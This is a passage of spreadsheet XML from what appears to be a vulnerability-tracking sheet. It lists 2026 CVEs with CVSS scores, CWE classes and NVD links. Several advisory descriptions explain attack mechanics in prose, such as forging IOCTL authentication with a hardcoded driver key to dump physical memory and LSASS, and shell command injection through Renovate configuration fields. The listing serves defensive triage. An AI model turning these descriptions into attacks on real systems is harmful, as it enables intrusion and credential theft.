      </c>
      <c r="P564" s="5" t="inlineStr"/>
      <c r="Q564" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R564"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S564" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75993</t>
        </is>
      </c>
    </row>
    <row r="565">
      <c r="A565" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B565" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C565" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76958</t>
        </is>
      </c>
      <c r="D565" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E565" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F565" s="5" t="inlineStr">
        <is>
          <t>cna@sap.com</t>
        </is>
      </c>
      <c r="G565" s="5" t="inlineStr"/>
      <c r="H565" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I565" s="5" t="inlineStr"/>
      <c r="J565" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K565" s="5" t="inlineStr"/>
      <c r="L565" s="5" t="inlineStr"/>
      <c r="M565" s="5" t="inlineStr"/>
      <c r="N565" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O565" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P565" s="5" t="inlineStr"/>
      <c r="Q565" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="R565"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S565" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76958</t>
        </is>
      </c>
    </row>
    <row r="566">
      <c r="A566" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B566" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C566" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80114</t>
        </is>
      </c>
      <c r="D566" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E566" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F566" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G566" s="5" t="inlineStr"/>
      <c r="H566" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I566" s="5" t="inlineStr"/>
      <c r="J566" s="5" t="inlineStr"/>
      <c r="K566" s="5" t="inlineStr"/>
      <c r="L566" s="5" t="inlineStr"/>
      <c r="M566" s="5" t="inlineStr"/>
      <c r="N566" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O566" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P566" s="5" t="inlineStr"/>
      <c r="Q566" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="R566" s="5" t="inlineStr">
        <is>
          <t>PassMark PerformanceTest before 11.1 build 1012, BurnInTest before 11.1 build 1000, and OSForensics before 11.1 build 1016 contain a hard-coded credentials vulnerability in DirectIo64.sys that allows local attackers to perform arbitrary physical memory writes by extracting an 8-byte key embedded as a hardcoded literal in the distributed binary and computing valid MD5 authentication tags for arbitrary IOCTL write requests. Attackers can additionally bypass a secondary validation gate by using the driver's own bit-clear IOCTL to clear a single bit in the gating instruction's displacement byte, causing all subsequent write requests to skip MAC verification, size checks, and Vendor ID checks entirely.</t>
        </is>
      </c>
      <c r="S566" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80114</t>
        </is>
      </c>
    </row>
    <row r="567">
      <c r="A567" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B567" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C567" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80116</t>
        </is>
      </c>
      <c r="D567" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E567" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F567" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G567" s="5" t="inlineStr"/>
      <c r="H567" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I567" s="5" t="inlineStr"/>
      <c r="J567" s="5" t="inlineStr"/>
      <c r="K567" s="5" t="inlineStr"/>
      <c r="L567" s="5" t="inlineStr"/>
      <c r="M567" s="5" t="inlineStr"/>
      <c r="N567" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O567" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P567" s="5" t="inlineStr"/>
      <c r="Q567" s="5" t="inlineStr">
        <is>
          <t>CWE-782</t>
        </is>
      </c>
      <c r="R567" s="5" t="inlineStr">
        <is>
          <t>PassMark PerformanceTest before 11.1 build 1012, BurnInTest before 11.1 build 1000, and OSForensics before 11.1 build 1016 contain a privilege escalation vulnerability in DirectIo64.sys that allows local users to modify hardware configuration by exploiting exposed IOCTLs with no validation on device selection, register offset, or value. Attackers can obtain a device handle and issue arbitrary PCI configuration space read/write operations to enable Bus Master DMA on any PCI device, halt storage controller I/O by clearing command registers, or remap Base Address Registers to redirect DMA to an attacker-chosen physical address.</t>
        </is>
      </c>
      <c r="S567" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80116</t>
        </is>
      </c>
    </row>
    <row r="568">
      <c r="A568" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B568" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C568" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80119</t>
        </is>
      </c>
      <c r="D568" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E568" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F568" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G568" s="5" t="inlineStr"/>
      <c r="H568" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I568" s="5" t="inlineStr"/>
      <c r="J568" s="5" t="inlineStr"/>
      <c r="K568" s="5" t="inlineStr"/>
      <c r="L568" s="5" t="inlineStr"/>
      <c r="M568" s="5" t="inlineStr"/>
      <c r="N568" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O568" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P568" s="5" t="inlineStr"/>
      <c r="Q568" s="5" t="inlineStr">
        <is>
          <t>CWE-497, CWE-73</t>
        </is>
      </c>
      <c r="R568" s="5" t="inlineStr">
        <is>
          <t>PassMark PerformanceTest before 11.1 build 1012, BurnInTest before 11.1 build 1000, and OSForensics before 11.1 build 1016 contain an information disclosure vulnerability in DirectIo64.sys that allows unauthenticated local attackers to dump complete physical memory contents by supplying a caller-controlled file path to an exposed IOCTL. Attackers can issue a single IOCTL call to trigger the driver to iterate all physical memory ranges via MmGetPhysicalMemoryRanges and map each page through ZwMapViewOfSection on the PhysicalMemory section object, writing a full RAM image to an attacker-specified path in the SYSTEM context, bypassing user-mode ACLs and exposing LSASS working set, process memory, and cryptographic material from all running processes.</t>
        </is>
      </c>
      <c r="S568" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80119</t>
        </is>
      </c>
    </row>
    <row r="569">
      <c r="A569" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B569" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C569" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81302</t>
        </is>
      </c>
      <c r="D569" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E569" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F569" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G569" s="5" t="inlineStr"/>
      <c r="H569" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I569" s="5" t="inlineStr"/>
      <c r="J569" s="5" t="inlineStr"/>
      <c r="K569" s="5" t="inlineStr"/>
      <c r="L569" s="5" t="inlineStr"/>
      <c r="M569" s="5" t="inlineStr"/>
      <c r="N569" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O569" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P569" s="5" t="inlineStr"/>
      <c r="Q569" s="5" t="inlineStr">
        <is>
          <t>CWE-276</t>
        </is>
      </c>
      <c r="R569" s="5" t="inlineStr">
        <is>
          <t>PALLET CONTROL products contain an incorrect default permission vulnerability, which may allow a local attacker to execute arbitrary code with SYSTEM privileges on the affected product.</t>
        </is>
      </c>
      <c r="S569" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81302</t>
        </is>
      </c>
    </row>
    <row r="570">
      <c r="A570" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B570" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C570" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85012</t>
        </is>
      </c>
      <c r="D570" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E570" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F570" s="5" t="inlineStr">
        <is>
          <t>ff89ba41-3aa1-4d27-914a-91399e9639e5</t>
        </is>
      </c>
      <c r="G570" s="5" t="inlineStr"/>
      <c r="H570" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I570" s="5" t="inlineStr"/>
      <c r="J570" s="5" t="inlineStr"/>
      <c r="K570" s="5" t="inlineStr"/>
      <c r="L570" s="5" t="inlineStr"/>
      <c r="M570" s="5" t="inlineStr"/>
      <c r="N570" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O570" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P570" s="5" t="inlineStr"/>
      <c r="Q570" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R570" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an OS command (CWE-78) in the blueprint resynthesis framework in Amazon Web Services codecatalyst-blueprints before 0.3.156 might allow a user with permission to commit to a repository in the project to execute arbitrary commands in the blueprint resynthesis environment via shell metacharacters in the owner field of a [local] merge strategy entry in a crafted .ownership-file.
Version 0.3.156 removes shell interpretation of the owner field, running the command directly rather than through a shell, and rejects values outside an allowlisted command form. This eliminates shell metacharacter command injection. To remediate this issue, users should upgrade to version 0.3.156 or later.
No action is required for use of the Amazon CodeCatalyst service. Resynthesis runs in an isolated per-project environment with scoped credentials, and the service applies server-side validation there that rejects [local] merge strategy commands outside a restricted allowlisted form, including for blueprint versions published before 0.3.156.</t>
        </is>
      </c>
      <c r="S570" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85012</t>
        </is>
      </c>
    </row>
    <row r="571">
      <c r="A571" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B571" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C571" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85384</t>
        </is>
      </c>
      <c r="D571" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E571" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F571" s="5" t="inlineStr">
        <is>
          <t>f23511db-6c3e-4e32-a477-6aa17d310630</t>
        </is>
      </c>
      <c r="G571" s="5" t="inlineStr"/>
      <c r="H571" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I571" s="5" t="inlineStr"/>
      <c r="J571" s="5" t="inlineStr"/>
      <c r="K571" s="5" t="inlineStr"/>
      <c r="L571" s="5" t="inlineStr"/>
      <c r="M571" s="5" t="inlineStr"/>
      <c r="N571" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O571" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P571" s="5" t="inlineStr"/>
      <c r="Q571" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R571"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S571" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85384</t>
        </is>
      </c>
    </row>
    <row r="572">
      <c r="A572" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B572" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C572" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85439</t>
        </is>
      </c>
      <c r="D572" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E572" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F572" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G572" s="5" t="inlineStr"/>
      <c r="H572" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I572" s="5" t="inlineStr"/>
      <c r="J572" s="5" t="inlineStr"/>
      <c r="K572" s="5" t="inlineStr"/>
      <c r="L572" s="5" t="inlineStr"/>
      <c r="M572" s="5" t="inlineStr"/>
      <c r="N572" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O572" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="P572" s="5" t="inlineStr"/>
      <c r="Q572" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R572" s="5" t="inlineStr">
        <is>
          <t>MOOS-IvP through 24.8.1 contains a remote code execution vulnerability in alogsplit's SplitHandler::handlePreCheckSplitDir() function that fails to sanitize shell metacharacters in log file pathnames. Attackers can embed shell syntax in log file names or the --dir parameter to execute arbitrary commands with the privileges of the operator running alogsplit.</t>
        </is>
      </c>
      <c r="S572" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85439</t>
        </is>
      </c>
    </row>
    <row r="573">
      <c r="A573" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B573" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C573" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85656</t>
        </is>
      </c>
      <c r="D573" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E573" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F573" s="5" t="inlineStr">
        <is>
          <t>ff89ba41-3aa1-4d27-914a-91399e9639e5</t>
        </is>
      </c>
      <c r="G573" s="5" t="inlineStr"/>
      <c r="H573" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I573" s="5" t="inlineStr"/>
      <c r="J573" s="5" t="inlineStr">
        <is>
          <t>log4j</t>
        </is>
      </c>
      <c r="K573" s="5" t="inlineStr"/>
      <c r="L573" s="5" t="inlineStr"/>
      <c r="M573" s="5" t="inlineStr"/>
      <c r="N573" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O573" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P573" s="5" t="inlineStr"/>
      <c r="Q573" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R573"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S573" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85656</t>
        </is>
      </c>
    </row>
    <row r="574">
      <c r="A574" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B574" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C574" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86095</t>
        </is>
      </c>
      <c r="D574" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E574" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F574" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G574" s="5" t="inlineStr"/>
      <c r="H574" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I574" s="5" t="inlineStr"/>
      <c r="J574" s="5" t="inlineStr"/>
      <c r="K574" s="5" t="inlineStr"/>
      <c r="L574" s="5" t="inlineStr"/>
      <c r="M574" s="5" t="inlineStr"/>
      <c r="N574" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O574" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P574" s="5" t="inlineStr"/>
      <c r="Q574" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R574" s="5" t="inlineStr">
        <is>
          <t>Unidata netcdf-c through 4.10.1 contains an out-of-bounds write vulnerability in NC4_HDF5_inq_attname() that copies HDF5 attribute names into a fixed 256-byte buffer without length validation. Attackers can craft HDF5 files with oversized attribute names to overflow the destination buffer, causing memory corruption and crashes when applications enumerate attribute names.</t>
        </is>
      </c>
      <c r="S574" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86095</t>
        </is>
      </c>
    </row>
    <row r="575">
      <c r="A575" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B575" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C575" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69479</t>
        </is>
      </c>
      <c r="D575" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E575" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F575" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G575" s="5" t="inlineStr"/>
      <c r="H575" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I575" s="5" t="inlineStr"/>
      <c r="J575" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K5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5" s="5" t="inlineStr"/>
      <c r="M575" s="5" t="inlineStr"/>
      <c r="N575" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O575" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P575" s="5" t="inlineStr"/>
      <c r="Q575" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R575" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="S575" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69479</t>
        </is>
      </c>
    </row>
    <row r="576">
      <c r="A576" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B576" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C576" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69638</t>
        </is>
      </c>
      <c r="D576" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E576" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F576" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G576" s="5" t="inlineStr"/>
      <c r="H576" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I576" s="5" t="inlineStr"/>
      <c r="J576" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K5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6" s="5" t="inlineStr"/>
      <c r="M576" s="5" t="inlineStr"/>
      <c r="N576" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O576" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P576" s="5" t="inlineStr"/>
      <c r="Q576" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R576" s="5" t="inlineStr">
        <is>
          <t>Heap-based</t>
        </is>
      </c>
      <c r="S576" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69638</t>
        </is>
      </c>
    </row>
    <row r="577">
      <c r="A577" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B577" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C577" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75999</t>
        </is>
      </c>
      <c r="D577" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E577" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F577" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G577" s="5" t="inlineStr"/>
      <c r="H577" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I577" s="5" t="inlineStr"/>
      <c r="J577" s="5" t="inlineStr"/>
      <c r="K577" s="5" t="inlineStr"/>
      <c r="L577" s="5" t="inlineStr"/>
      <c r="M577" s="5" t="inlineStr"/>
      <c r="N577" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O577" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P577" s="5" t="inlineStr"/>
      <c r="Q577" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R577" s="5" t="inlineStr">
        <is>
          <t>ColdFusion is affected by an Improper Input Validation vulnerability that could result in arbitrary code execution in the context of the current user. A low-privileged attacker could exploit this vulnerability to execute arbitrary code. The vulnerable component is restricted to an administrative network zone by default. Exploitation of this issue requires user interaction in that a victim must open a malicious file. Scope is changed.</t>
        </is>
      </c>
      <c r="S577" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75999</t>
        </is>
      </c>
    </row>
    <row r="578">
      <c r="A578" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B578" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C578" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76228</t>
        </is>
      </c>
      <c r="D578" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E578" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F578" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G578" s="5" t="inlineStr"/>
      <c r="H578" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I578" s="5" t="inlineStr"/>
      <c r="J578" s="5" t="inlineStr"/>
      <c r="K578" s="5" t="inlineStr"/>
      <c r="L578" s="5" t="inlineStr"/>
      <c r="M578" s="5" t="inlineStr"/>
      <c r="N578" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O578" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="P578" s="5" t="inlineStr"/>
      <c r="Q578" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R578" s="5" t="inlineStr">
        <is>
          <t>Renovate versions &gt;=32.124.0 and before 42.68.5 (and Mend renovate-ce/renovate-ee before 13.3.0) contain a command injection vulnerability in Gradle Wrapper artifact handling. When Renovate processes Gradle Wrapper updates, it invokes a wrapper update command via a shell (e.g. /bin/sh -c ... ./gradlew :wrapper --gradle-distribution-url &lt;value&gt;). If an attacker supplies a malicious gradle-wrapper.properties whose distributionUrl contains shell command substitution syntax such as $(...), the shell evaluates it before Gradle parses the URL, resulting in arbitrary command execution in the Renovate runtime. Exploitation requires the attacker to introduce the malicious file into a repository that Renovate scans; the issue occurs even when allowScripts is disabled.</t>
        </is>
      </c>
      <c r="S578" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76228</t>
        </is>
      </c>
    </row>
    <row r="579">
      <c r="A579" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B579" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C579" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76229</t>
        </is>
      </c>
      <c r="D579" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E579" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F579" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G579" s="5" t="inlineStr"/>
      <c r="H579" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I579" s="5" t="inlineStr"/>
      <c r="J579" s="5" t="inlineStr"/>
      <c r="K579" s="5" t="inlineStr"/>
      <c r="L579" s="5" t="inlineStr"/>
      <c r="M579" s="5" t="inlineStr"/>
      <c r="N579" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O579" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="P579" s="5" t="inlineStr"/>
      <c r="Q579" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="R579" s="5" t="inlineStr">
        <is>
          <t>Renovate versions from 39.218.0 before 40.33.0 contain an arbitrary command injection vulnerability in the kustomize manager where user-provided chart names are appended to helm pull commands without proper sanitization. Attackers with repository write access can craft malicious kustomization.yaml files with specially crafted chart names to execute arbitrary commands on the Renovate host machine.</t>
        </is>
      </c>
      <c r="S579" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76229</t>
        </is>
      </c>
    </row>
    <row r="580">
      <c r="A580" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B580" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C580" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76230</t>
        </is>
      </c>
      <c r="D580" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E580" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F580" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G580" s="5" t="inlineStr"/>
      <c r="H580" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I580" s="5" t="inlineStr"/>
      <c r="J580" s="5" t="inlineStr"/>
      <c r="K580" s="5" t="inlineStr"/>
      <c r="L580" s="5" t="inlineStr"/>
      <c r="M580" s="5" t="inlineStr"/>
      <c r="N580" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O580" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="P580" s="5" t="inlineStr"/>
      <c r="Q580" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="R580" s="5" t="inlineStr">
        <is>
          <t>Renovate versions from 35.63.0 before 40.33.0 contain a command injection vulnerability in the npm manager where user-provided packageName values are appended to npm install commands without proper sanitization. Attackers with repository write access can craft malicious Renovate configuration files to execute arbitrary commands on the machine running Renovate.</t>
        </is>
      </c>
      <c r="S580" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76230</t>
        </is>
      </c>
    </row>
    <row r="581">
      <c r="A581" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B581" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C581" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76231</t>
        </is>
      </c>
      <c r="D581" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E581" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F581" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G581" s="5" t="inlineStr"/>
      <c r="H581" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I581" s="5" t="inlineStr"/>
      <c r="J581" s="5" t="inlineStr"/>
      <c r="K581" s="5" t="inlineStr"/>
      <c r="L581" s="5" t="inlineStr"/>
      <c r="M581" s="5" t="inlineStr"/>
      <c r="N581" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O581" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="P581" s="5" t="inlineStr"/>
      <c r="Q581" s="5" t="inlineStr">
        <is>
